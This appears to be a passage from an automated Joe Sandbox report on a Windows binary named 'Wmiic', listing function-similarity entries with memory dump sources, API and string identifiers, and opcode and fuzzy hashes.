                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: _getptd$BaseImage
• String ID:
• API String ID: 2482573191-0
• Opcode ID: 2237048bf79284b0269ed9c29fe75178a274c15cdf13b4d9d56bc2e72612f190
• Instruction ID: 43c81dbebb5e7642f9f0f2e393759842062bb8c55fdd15a841d76fd40ecc4635
• Opcode Fuzzy Hash: 2237048bf79284b0269ed9c29fe75178a274c15cdf13b4d9d56bc2e72612f190
• Instruction Fuzzy Hash: B241877220158185EA26A727E4457EDA794BB8DFD8F558121FF194B7F2CF36C482C701
APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID: get_service_username()$username
• API String ID: 1617791916-1118073074
• Opcode ID: c429dc061a9a6cf9038fc22e94fa89e910a21fbdcc0c89adca4798bb4a11ac5d
• Instruction ID: 0cb368d2c87889caaf96027648e82f4ecc8631b9f2301991adb876be56352873
• Opcode Fuzzy Hash: c429dc061a9a6cf9038fc22e94fa89e910a21fbdcc0c89adca4798bb4a11ac5d
• Instruction Fuzzy Hash: 8C218E35311F9181EB52EB66A4007D963A0FB4DBD4F145115FFA9477AADF39C5918300
APIs
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: CurrentProcess$DuplicateErrorHandleLast
• String ID:
• API String ID: 3907606552-0
• Opcode ID: a1a1746b7a1b8be94718e7fd56a79bcc54c5f9d3e77d580c70b2e15733a3a24d
• Instruction ID: 063db28a99952865a7c583c334f68a92e69e6d162e6800a70cf4d12b91e85143
• Opcode Fuzzy Hash: a1a1746b7a1b8be94718e7fd56a79bcc54c5f9d3e77d580c70b2e15733a3a24d
• Instruction Fuzzy Hash: D1118FB1604B8086E761DF13B80079AB3B0FB99BC4F544129FF8943769DB3CD5458A44
APIs
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: DecodePointer_errno_flush_freebuf
• String ID:
• API String ID: 1889905870-0
• Opcode ID: 658a91a57760e8bfdda30ba3aa02c586fb4cbff4a2ea938cc334cdc9ad90d10b
• Instruction ID: dd73d03f2c1ea2f4e6da5caa570c6c82c2ded73eed670ef386c6a809164821d1
• Opcode Fuzzy Hash: 658a91a57760e8bfdda30ba3aa02c586fb4cbff4a2ea938cc334cdc9ad90d10b
• Instruction Fuzzy Hash: 0401D432B1474042FB17AB7794513ED62515BDD7E8F280328BB524B5F7CE39CC818240
APIs
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Window$Rect$DesktopMove
• String ID:
• API String ID: 2894293738-0
• Opcode ID: 6c793aff5eefccb5bb44ad8668e35a694a0f6c32e109282dd85a116bf074420f
• Instruction ID: 9b88486dfa801f3ea56ee834c5fc61d219d0278a4a683ae30dfced5db79f75a2
• Opcode Fuzzy Hash: 6c793aff5eefccb5bb44ad8668e35a694a0f6c32e109282dd85a116bf074420f
• Instruction Fuzzy Hash: 940121723255418BEB65CF3AB4087597BA1F789BC5F485118BF4A93768DF3CD8048B04
APIs
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: __doserrno_errno
• String ID:
• API String ID: 921712934-0
• Opcode ID: e500c259cdb1fa6dcf6b2e184e15fca3845d434d9491e58f95f4bba58c537ff6
• Instruction ID: 94aae76b054f4c278dc94295e20dd2d585d9ec13bd88ad299c4b3e6ab06a23ff
• Opcode Fuzzy Hash: e500c259cdb1fa6dcf6b2e184e15fca3845d434d9491e58f95f4bba58c537ff6
• Instruction Fuzzy Hash: 09014F7261064485FB176B66C9913E926629B98BF5F548349FB2A0B3F2CB394815CA10
APIs
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: MessageSend$Item$EnvironmentTextVariable_snwprintf_s
• String ID:
• API String ID: 2263371560-0
• Opcode ID: 1e261de19b2049f26f316e4d274318e75987586aff01661f23e1450ee786f346
• Instruction ID: a487d99df9754013241ce58257599312179a340a947fd995e23cf4898c0dcb84
• Opcode Fuzzy Hash: 1e261de19b2049f26f316e4d274318e75987586aff01661f23e1450ee786f346
• Instruction Fuzzy Hash: EFF06DB471145042FB62D773F579BEA2251978DBC4F81102AAE0A0BFA5CD3D84C94700
APIs
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: MessageSend$Item$EnvironmentTextVariable_snwprintf_s
• String ID:
• API String ID: 2263371560-0
• Opcode ID: 321d717a814a89acfc3efa5d88a05e77f0a26d3068045a377efcac5b98d509ea
• Instruction ID: b8c1a0b79c580c7536ba96cf28a415a1f70d0243cf03293b484bff3c148e4e38
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 321d717a814a89acfc3efa5d88a05e77f0a26d3068045a377efcac5b98d509ea
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07F05E7871154042FB629773B979BDA225197CDBC4F811029AE4A0BFA5DD3C848A4700
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                    • API String ID: 3186804695-3733052814
                                                                                                                                                                                                    • Opcode ID: c278b547bf228ec2d41bf35c1773a0c57779f941625d245b0e0dc3692df98d56
                                                                                                                                                                                                    • Instruction ID: d9d2eefccdb791b5da5f69efa20d78588aa8d92e6e4a8d7ac5f61f1dcab05ab9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c278b547bf228ec2d41bf35c1773a0c57779f941625d245b0e0dc3692df98d56
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F518F3220428086EB669E27A4407FD76E1F749BD8F044125FB995BBFACB39C891DB01
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentVariable_snwprintf_s
                                                                                                                                                                                                    • String ID: %llu
                                                                                                                                                                                                    • API String ID: 709434441-507646796
                                                                                                                                                                                                    • Opcode ID: 62323e847072239d2dfe07a9b4d82c4042ae325b3561faaad9a455eb713a102c
                                                                                                                                                                                                    • Instruction ID: e467e5e73326f99c3117ac0c8c0fbe1bd46234100152dbfbcb59804b6ff9c8b8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62323e847072239d2dfe07a9b4d82c4042ae325b3561faaad9a455eb713a102c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 581142F271568487EE55CF25F450399B3AAF78C7D0F40622ABB5A4BBA9DB38C445CB00
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$Source$DeregisterRegisterReport_snwprintf_s
                                                                                                                                                                                                    • String ID: %s%s$set_createfile_parameter()
                                                                                                                                                                                                    • API String ID: 3081108292-102671490
                                                                                                                                                                                                    • Opcode ID: db437f29594db4c845281d8ab962dddfa93ab2c9490456a63c896ed5cf6eaedd
                                                                                                                                                                                                    • Instruction ID: 36db2d84d5898f6ff56e4daee3153183d4249f022df8d192bd57ebdc47628223
                                                                                                                                                                                                    • Opcode Fuzzy Hash: db437f29594db4c845281d8ab962dddfa93ab2c9490456a63c896ed5cf6eaedd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1101B172614A8042F622DB16F851BDA6354BB8C7E4F540325BFAC477E5DF38C50A8740
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 3186804695-1018135373
                                                                                                                                                                                                    • Opcode ID: f518a2f01546b2857537e82e835672f00eb15f2ecaa500e75dd14d18472aae28
                                                                                                                                                                                                    • Instruction ID: 3abc21f0dc36ef9efe3608e6f583550ad69bd6604c7f8c9ada24669edb6f4e5a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f518a2f01546b2857537e82e835672f00eb15f2ecaa500e75dd14d18472aae28
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 480152322416418ADB72AF23C8503EC23A4E79DBCAF894129EF8D0B7A5DB31C994C305